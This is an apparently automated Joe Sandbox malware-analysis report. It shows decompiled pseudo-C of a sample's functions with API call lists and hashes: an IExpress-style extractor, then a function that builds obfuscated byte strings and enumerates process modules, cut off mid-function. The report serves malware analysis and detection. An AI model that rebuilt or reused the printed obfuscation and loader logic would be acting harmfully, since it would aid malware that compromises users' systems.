                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                      • Instruction ID: 119c50f11e19e2f3e0b8d2d475fa5528bcfd264ee14c0bd485c31444b651d7d8
                                                                      • Opcode Fuzzy Hash: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                      • Instruction Fuzzy Hash: 23112871D0560C9BCF10EBB8DA48AEEBBF4EB08350FA14856D801E7214EA309A05AF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00F863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				long _v272;
                                                                      				void* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t15;
                                                                      				long _t28;
                                                                      				struct _OVERLAPPED* _t37;
                                                                      				void* _t39;
                                                                      				signed int _t40;
                                                                      
                                                                      				_t15 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t15 ^ _t40;
                                                                      				_v272 = _v272 & 0x00000000;
                                                                      				_push(__ecx);
                                                                      				_v276 = _a16;
                                                                      				_t37 = 1;
                                                                      				E00F81781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      				E00F8658A( &_v268, 0x104, _a12);
                                                                      				_t28 = 0;
                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                      				if(_t39 != 0xffffffff) {
                                                                      					_t28 = _a4;
                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                      						 *0xf89124 = 0x80070052;
                                                                      						_t37 = 0;
                                                                      					}
                                                                      					CloseHandle(_t39);
                                                                      				} else {
                                                                      					 *0xf89124 = 0x80070052;
                                                                      					_t37 = 0;
                                                                      				}
                                                                      				return E00F86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                      			}
















                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8642D
                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8645B
                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8647A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F863EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 1065093856-1116576409
                                                                      • Opcode ID: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                      • Instruction ID: 14746c62804371590d1fadec75ad96ce43b6c250d46e65103746dc1d49c9ecbb
                                                                      • Opcode Fuzzy Hash: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                      • Instruction Fuzzy Hash: 1921C071A0021CABDB10EF65DCC5FEF77A8EB45314F0041A9B585A7280DAB45D85AFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F847E0(intOrPtr* __ecx) {
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t19;
                                                                      				intOrPtr* _t22;
                                                                      				void _t24;
                                                                      				struct HWND__* _t25;
                                                                      				struct HWND__* _t26;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t33 = __ecx;
                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                      				if(_t34 != 0) {
                                                                      					_t22 = _t33;
                                                                      					_t27 = _t22 + 1;
                                                                      					do {
                                                                      						_t6 =  *_t22;
                                                                      						_t22 = _t22 + 1;
                                                                      					} while (_t6 != 0);
                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                      					 *_t34 = _t24;
                                                                      					if(_t24 != 0) {
                                                                      						_t28 = _t33;
                                                                      						_t19 = _t28 + 1;
                                                                      						do {
                                                                      							_t9 =  *_t28;
                                                                      							_t28 = _t28 + 1;
                                                                      						} while (_t9 != 0);
                                                                      						E00F81680(_t24, _t28 - _t19 + 1, _t33);
                                                                      						_t11 =  *0xf891e0; // 0x798408
                                                                      						 *(_t34 + 4) = _t11;
                                                                      						 *0xf891e0 = _t34;
                                                                      						return 1;
                                                                      					}
                                                                      					_t25 =  *0xf88584; // 0x0
                                                                      					E00F844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                      					LocalFree(_t34);
                                                                      					L2:
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 =  *0xf88584; // 0x0
                                                                      				E00F844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                      				goto L2;
                                                                      			}
















                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F84E6F), ref: 00F847EA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F84823
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F84847
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F84851
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 359063898-1116576409
                                                                      • Opcode ID: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                      • Instruction ID: d2b55955bc15a6e7ea0e2654f7c4de75b5bb33b86ecad95187507d65248e06c2
                                                                      • Opcode Fuzzy Hash: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                      • Instruction Fuzzy Hash: BB11E975604A42AFE714AF249C18FF73B5AEB85750F048519FD829B341DB39AC06A760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83680(void* __ecx) {
                                                                      				void* _v8;
                                                                      				struct tagMSG _v36;
                                                                      				int _t8;
                                                                      				struct HWND__* _t16;
                                                                      
                                                                      				_v8 = __ecx;
                                                                      				_t16 = 0;
                                                                      				while(1) {
                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                      					if(_t8 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						do {
                                                                      							if(_v36.message != 0x12) {
                                                                      								DispatchMessageA( &_v36);
                                                                      							} else {
                                                                      								_t16 = 1;
                                                                      							}
                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                      						} while (_t8 != 0);
                                                                      						if(_t16 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return _t8;
                                                                      			}








                                                                      APIs
                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                      • DispatchMessageA.USER32(?), ref: 00F836CB
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      • Opcode ID: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                      • Instruction ID: 08420924679f50936865472e67414d024ad850c8cd23b359424f5f36ee18f569
                                                                      • Opcode Fuzzy Hash: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                      • Instruction Fuzzy Hash: 7A01A772D0021877DB305BAA9C4CEEB777CEBC5F20F10012AFE05E2294E561C640EB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00F86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                      				struct HRSRC__* _t6;
                                                                      				void* _t21;
                                                                      				struct HINSTANCE__* _t23;
                                                                      				int _t24;
                                                                      
                                                                      				_t23 =  *0xf89a3c; // 0xf80000
                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                      				if(_t6 == 0) {
                                                                      					L6:
                                                                      					E00F844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                      					_t24 = _a16;
                                                                      				} else {
                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						if(_a12 != 0) {
                                                                      							_push(_a12);
                                                                      						} else {
                                                                      							_push(0);
                                                                      						}
                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                      						FreeResource(_t21);
                                                                      						if(_t24 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t24;
                                                                      			}








                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                      • LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                      • DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                      • FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                      • Instruction ID: 038db0188b6b6ecfeb8200b909a4f3424ee9bf7b758b181cf6235dbd9acd4c24
                                                                      • Opcode Fuzzy Hash: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                      • Instruction Fuzzy Hash: DB012672500609BBDB106FA99C08EFB7B6DEB85770F08012AFE00E7190D7758C10BBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00F865E8(char* __ecx) {
                                                                      				char _t3;
                                                                      				char _t10;
                                                                      				char* _t12;
                                                                      				char* _t14;
                                                                      				char* _t15;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t12 = __ecx;
                                                                      				_t15 = __ecx;
                                                                      				_t14 =  &(__ecx[1]);
                                                                      				_t10 = 0;
                                                                      				do {
                                                                      					_t3 =  *_t12;
                                                                      					_t12 =  &(_t12[1]);
                                                                      				} while (_t3 != 0);
                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                      				while(1) {
                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                      					if(_t16 <= _t15) {
                                                                      						break;
                                                                      					}
                                                                      					if( *_t16 == 0x5c) {
                                                                      						L7:
                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                      							_t16 = CharNextA(_t16);
                                                                      						}
                                                                      						 *_t16 = _t10;
                                                                      						_t10 = 1;
                                                                      					} else {
                                                                      						_push(_t16);
                                                                      						continue;
                                                                      					}
                                                                      					L11:
                                                                      					return _t10;
                                                                      				}
                                                                      				if( *_t16 == 0x5c) {
                                                                      					goto L7;
                                                                      				}
                                                                      				goto L11;
                                                                      			}










                                                                      APIs
                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F82B33), ref: 00F86602
                                                                      • CharPrevA.USER32(?,00000000), ref: 00F86612
                                                                      • CharPrevA.USER32(?,00000000), ref: 00F86629
                                                                      • CharNextA.USER32(00000000), ref: 00F86635
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      • Opcode ID: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                      • Instruction ID: 299e924a534fcbca7eb75718cccfd759b86cc50cca99043f17e5d2ca433e4bf5
                                                                      • Opcode Fuzzy Hash: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                      • Instruction Fuzzy Hash: 45F028328045D06EE7322B288CCC9FBBF9CCF87374B2901AFE491D6001E6150D06AB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F869B0() {
                                                                      				intOrPtr* _t4;
                                                                      				intOrPtr* _t5;
                                                                      				void* _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      
                                                                      				 *0xf881f8 = E00F86C70();
                                                                      				__set_app_type(E00F86FBE(2));
                                                                      				 *0xf888a4 =  *0xf888a4 | 0xffffffff;
                                                                      				 *0xf888a8 =  *0xf888a8 | 0xffffffff;
                                                                      				_t4 = __p__fmode();
                                                                      				_t11 =  *0xf88528; // 0x0
                                                                      				 *_t4 = _t11;
                                                                      				_t5 = __p__commode();
                                                                      				_t12 =  *0xf8851c; // 0x0
                                                                      				 *_t5 = _t12;
                                                                      				_t6 = E00F87000();
                                                                      				if( *0xf88000 == 0) {
                                                                      					__setusermatherr(E00F87000);
                                                                      				}
                                                                      				E00F871EF(_t6);
                                                                      				return 0;
                                                                      			}









                                                                      APIs
                                                                        • Part of subcall function 00F86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F86FC5
                                                                      • __set_app_type.MSVCRT ref: 00F869C2
                                                                      • __p__fmode.MSVCRT ref: 00F869D8
                                                                      • __p__commode.MSVCRT ref: 00F869E6
                                                                      • __setusermatherr.MSVCRT ref: 00F86A07
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                      • Instruction ID: f50726348e5ae571c8d528ac3aaccc42d652a483433e80a023c1e25af142567b
                                                                      • Opcode Fuzzy Hash: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                      • Instruction Fuzzy Hash: BAF098745093098FDB68BB34BD0E6E43B61FB05371B60061AE461862E5CF3ED546BB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:30.8%
                                                                      Signature Coverage:14%
                                                                      Total number of Nodes:399
                                                                      Total number of Limit Nodes:39

                                                                      Control-flow Graph

                                                                      [Figure: control-flow graph of function 4019f0; nodes marked Executed / Not Executed]
                                                                      C-Code - Quality: 77%
                                                                      			E004019F0(void* __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t337;
                                                                      				void* _t340;
                                                                      				int _t341;
                                                                      				CHAR* _t344;
                                                                      				intOrPtr* _t349;
                                                                      				int _t350;
                                                                      				long _t352;
                                                                      				signed int _t354;
                                                                      				intOrPtr _t358;
                                                                      				long _t359;
                                                                      				CHAR* _t364;
                                                                      				struct HINSTANCE__* _t365;
                                                                      				CHAR* _t366;
                                                                      				_Unknown_base(*)()* _t367;
                                                                      				int _t368;
                                                                      				int _t369;
                                                                      				int _t370;
                                                                      				intOrPtr* _t376;
                                                                      				int _t378;
                                                                      				intOrPtr _t379;
                                                                      				intOrPtr* _t381;
                                                                      				int _t383;
                                                                      				intOrPtr* _t384;
                                                                      				int _t385;
                                                                      				int _t396;
                                                                      				int _t399;
                                                                      				int _t402;
                                                                      				int _t405;
                                                                      				intOrPtr* _t407;
                                                                      				int _t413;
                                                                      				int _t415;
                                                                      				void* _t421;
                                                                      				int _t422;
                                                                      				int _t424;
                                                                      				intOrPtr* _t428;
                                                                      				intOrPtr _t429;
                                                                      				intOrPtr* _t431;
                                                                      				int _t432;
                                                                      				int _t435;
                                                                      				intOrPtr* _t437;
                                                                      				int _t438;
                                                                      				intOrPtr* _t439;
                                                                      				int _t440;
                                                                      				int _t442;
                                                                      				signed int _t448;
                                                                      				signed int _t451;
                                                                      				signed int _t452;
                                                                      				int _t469;
                                                                      				int _t471;
                                                                      				int _t482;
                                                                      				signed int _t486;
                                                                      				intOrPtr* _t488;
                                                                      				intOrPtr* _t490;
                                                                      				intOrPtr* _t492;
                                                                      				intOrPtr _t493;
                                                                      				void* _t494;
                                                                      				struct HRSRC__* _t497;
                                                                      				void* _t514;
                                                                      				int _t519;
                                                                      				intOrPtr* _t520;
                                                                      				void* _t524;
                                                                      				void* _t525;
                                                                      				struct HINSTANCE__* _t526;
                                                                      				intOrPtr _t527;
                                                                      				void* _t531;
                                                                      				void* _t535;
                                                                      				struct HRSRC__* _t536;
                                                                      				intOrPtr* _t537;
                                                                      				intOrPtr* _t539;
                                                                      				int _t542;
                                                                      				int _t543;
                                                                      				intOrPtr* _t547;
                                                                      				intOrPtr* _t548;
                                                                      				intOrPtr* _t549;
                                                                      				intOrPtr* _t550;
                                                                      				void* _t551;
                                                                      				intOrPtr _t552;
                                                                      				int _t555;
                                                                      				void* _t556;
                                                                      				void* _t557;
                                                                      				void* _t558;
                                                                      				void* _t559;
                                                                      				void* _t560;
                                                                      				void* _t561;
                                                                      				void* _t562;
                                                                      				intOrPtr* _t563;
                                                                      				void* _t564;
                                                                      				void* _t565;
                                                                      				void* _t566;
                                                                      				void* _t567;
                                                                      
                                                                      				_t567 = __eflags;
                                                                      				_t494 = __edx;
                                                                      				__imp__OleInitialize(0); // executed
                                                                      				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                      				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                      				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                      				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                      				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                      				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                      				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                      				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                      				 *((char*)(_t556 + 0x23)) = 6;
                                                                      				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                      				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                      				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                      				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                      				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                      				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                      				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                      				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                      				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                      				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                      				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                      				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                      				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                      				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                      				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                      				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                      				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                      				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                      				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                      				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                      				 *((char*)(_t556 + 0x38)) = 0;
                                                                      				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                      				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                      				_t557 = _t556 + 0xc;
                                                                      				if(_t337 == 0x41b2a0) {
                                                                      					L80:
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                      					_t525 = _t340;
                                                                      					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                      					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                      					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                      					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                      					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                      					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                      					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                      					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                      					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                      					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                      					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                      					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                      					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                      					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                      					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                      					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                      					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                      					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                      					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                      					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                      					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                      					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                      					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                      					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                      					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                      					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                      					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                      					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                      					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                      					 *((char*)(_t557 + 0x84)) = 0;
                                                                      					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                      					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                      					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                      					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                      					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                      					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                      					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                      					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                      					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                      					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                      					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                      					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                      					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                      					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                      					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                      					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                      					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                      					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                      					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                      					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                      					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                      					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                      					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                      					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                      					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                      					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                      					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                      					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                      					 *((char*)(_t557 + 0x38)) = 0;
                                                                      					_t341 = Module32First(_t525, _t557 + 0x278); // executed
